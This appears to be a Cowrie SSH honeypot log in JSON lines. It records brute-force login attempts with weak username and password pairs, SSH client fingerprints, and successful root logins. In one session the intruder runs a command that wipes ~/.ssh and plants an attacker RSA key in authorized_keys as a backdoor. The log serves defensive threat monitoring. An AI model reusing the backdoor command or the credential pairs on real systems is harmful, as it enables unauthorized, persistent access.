{"eventid":"cowrie.login.failed","username":"worker","password":"password","message":"login attempt [worker/password] failed","sensor":"my-vps","timestamp":"2025-08-31T00:16:51.770216Z","src_ip":"212.227.235.229","session":"3daf15ae706c"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:16:53.078329Z","src_ip":"212.227.235.229","session":"3daf15ae706c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:16:53.659548Z","src_ip":"201.148.180.50","session":"41bcd134092d"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-31T00:16:53.660283Z","src_ip":"201.148.180.50","session":"41bcd134092d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:16:54.796882Z","src_ip":"201.148.180.50","session":"41bcd134092d"}
{"eventid":"cowrie.session.closed","duration":"10.5","message":"Connection lost after 10.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:16:54.798164Z","src_ip":"201.148.180.50","session":"41bcd134092d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59376,"dst_ip":"1.2.3.4","dst_port":22,"session":"2182febd0d02","protocol":"ssh","message":"New connection: 212.227.235.229:59376 (1.2.3.4:22) [session: 2182febd0d02]","sensor":"my-vps","timestamp":"2025-08-31T00:16:58.358092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:16:59.748409Z","src_ip":"212.227.235.229","session":"2182febd0d02"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:16:59.749384Z","src_ip":"212.227.235.229","session":"2182febd0d02"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T00:17:03.456791Z","src_ip":"212.227.235.229","session":"2182febd0d02"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:17:05.208396Z","src_ip":"212.227.235.229","session":"2182febd0d02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49910,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0ceee22d7cb","protocol":"ssh","message":"New connection: 212.227.125.160:49910 (1.2.3.4:22) [session: f0ceee22d7cb]","sensor":"my-vps","timestamp":"2025-08-31T00:17:18.362899Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:17:18.774361Z","src_ip":"212.227.125.160","session":"f0ceee22d7cb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:17:18.776490Z","src_ip":"212.227.125.160","session":"f0ceee22d7cb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T00:17:20.625212Z","src_ip":"212.227.125.160","session":"f0ceee22d7cb"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:17:21.981336Z","src_ip":"212.227.125.160","session":"f0ceee22d7cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46802,"dst_ip":"1.2.3.4","dst_port":22,"session":"648d7fa13f9d","protocol":"ssh","message":"New connection: 212.227.235.229:46802 (1.2.3.4:22) [session: 648d7fa13f9d]","sensor":"my-vps","timestamp":"2025-08-31T00:17:48.134518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:17:48.135473Z","src_ip":"212.227.235.229","session":"648d7fa13f9d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:17:48.436657Z","src_ip":"212.227.235.229","session":"648d7fa13f9d"}
{"eventid":"cowrie.login.failed","username":"work","password":"work12","message":"login attempt [work/work12] failed","sensor":"my-vps","timestamp":"2025-08-31T00:17:49.681427Z","src_ip":"212.227.235.229","session":"648d7fa13f9d"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:17:50.986140Z","src_ip":"212.227.235.229","session":"648d7fa13f9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49486,"dst_ip":"1.2.3.4","dst_port":22,"session":"b90f2c18098e","protocol":"ssh","message":"New connection: 212.227.235.229:49486 (1.2.3.4:22) [session: b90f2c18098e]","sensor":"my-vps","timestamp":"2025-08-31T00:18:01.764590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:18:04.406414Z","src_ip":"212.227.235.229","session":"b90f2c18098e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:18:04.407168Z","src_ip":"212.227.235.229","session":"b90f2c18098e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T00:18:05.877017Z","src_ip":"212.227.235.229","session":"b90f2c18098e"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:18:07.382218Z","src_ip":"212.227.235.229","session":"b90f2c18098e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43148,"dst_ip":"1.2.3.4","dst_port":22,"session":"4711764721cc","protocol":"ssh","message":"New connection: 212.227.125.160:43148 (1.2.3.4:22) [session: 4711764721cc]","sensor":"my-vps","timestamp":"2025-08-31T00:18:24.492050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:18:24.871186Z","src_ip":"212.227.125.160","session":"4711764721cc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:18:24.871972Z","src_ip":"212.227.125.160","session":"4711764721cc"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T00:18:27.170759Z","src_ip":"212.227.125.160","session":"4711764721cc"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:18:28.829347Z","src_ip":"212.227.125.160","session":"4711764721cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57648,"dst_ip":"1.2.3.4","dst_port":22,"session":"9932c822e5fb","protocol":"ssh","message":"New connection: 212.227.235.229:57648 (1.2.3.4:22) [session: 9932c822e5fb]","sensor":"my-vps","timestamp":"2025-08-31T00:18:48.844949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:18:48.846099Z","src_ip":"212.227.235.229","session":"9932c822e5fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:18:49.145070Z","src_ip":"212.227.235.229","session":"9932c822e5fb"}
{"eventid":"cowrie.login.success","username":"root","password":"123123123","message":"login attempt [root/123123123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:18:50.363225Z","src_ip":"212.227.235.229","session":"9932c822e5fb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:18:50.980715Z","src_ip":"212.227.235.229","session":"9932c822e5fb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:18:50.981694Z","src_ip":"212.227.235.229","session":"9932c822e5fb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:18:50.983082Z","src_ip":"212.227.235.229","session":"9932c822e5fb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:18:51.287507Z","src_ip":"212.227.235.229","session":"9932c822e5fb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:18:51.946873Z","src_ip":"212.227.235.229","session":"9932c822e5fb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:18:51.947654Z","src_ip":"212.227.235.229","session":"9932c822e5fb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:18:52.249428Z","src_ip":"212.227.235.229","session":"9932c822e5fb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:18:52.250273Z","src_ip":"212.227.235.229","session":"9932c822e5fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36694,"dst_ip":"1.2.3.4","dst_port":22,"session":"54264bcef381","protocol":"ssh","message":"New connection: 212.227.235.229:36694 (1.2.3.4:22) [session: 54264bcef381]","sensor":"my-vps","timestamp":"2025-08-31T00:18:52.558060Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:18:52.558821Z","src_ip":"212.227.235.229","session":"54264bcef381"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:18:52.863671Z","src_ip":"212.227.235.229","session":"54264bcef381"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:18:54.123840Z","src_ip":"212.227.235.229","session":"54264bcef381"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:18:55.432114Z","src_ip":"212.227.235.229","session":"54264bcef381"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42646,"dst_ip":"1.2.3.4","dst_port":22,"session":"2eaa42b3cd0b","protocol":"ssh","message":"New connection: 212.227.235.229:42646 (1.2.3.4:22) [session: 2eaa42b3cd0b]","sensor":"my-vps","timestamp":"2025-08-31T00:18:56.726138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:18:56.727028Z","src_ip":"212.227.235.229","session":"2eaa42b3cd0b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:18:57.031799Z","src_ip":"212.227.235.229","session":"2eaa42b3cd0b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:18:58.291561Z","src_ip":"212.227.235.229","session":"2eaa42b3cd0b"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:18:58.593331Z","src_ip":"212.227.235.229","session":"9932c822e5fb"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:18:58.597563Z","src_ip":"212.227.235.229","session":"2eaa42b3cd0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40732,"dst_ip":"1.2.3.4","dst_port":22,"session":"1461f779a1b3","protocol":"ssh","message":"New connection: 212.227.235.229:40732 (1.2.3.4:22) [session: 1461f779a1b3]","sensor":"my-vps","timestamp":"2025-08-31T00:19:05.868647Z"}
